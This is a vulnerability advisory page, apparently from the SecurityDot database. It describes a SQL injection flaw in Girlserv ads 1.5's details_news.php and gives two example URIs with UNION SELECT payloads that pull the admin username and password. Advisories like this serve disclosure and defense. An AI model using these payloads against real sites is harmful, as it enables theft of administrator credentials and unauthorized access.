exploits , vulnerabilities , articles , Girlserv Ads Details_News.PHP SQL Injection Vulnerability

Title	Girlserv Ads Details_News.PHP SQL Injection Vulnerability
Published	2007-07-03-12:00AM
Updated	2007-07-04-10:27PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Cold z3ro is credited with the discovery of this vulnerability.
Vulnerable	Girlserv ads 1.5
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following example URIs are available:http://www.example.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/* http://www.example.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities
• 2009-12-10 Linux Kernel KVM Large SMP Instruction Local Denial of Service Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Data Injection Remote Code Execution Vulnerability
• 2009-12-09 Adobe Flash Player ActiveX Control Information Disclosure Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Multiple Unspecified Remote Code Execution Vulnerabilities
• 2009-12-09 HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities
• 2009-12-09 Shibboleth Redirection URL HTML Injection Vulnerability
• 2009-12-09 VLC Media Player RTSP Remote Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 13:14:39 +0000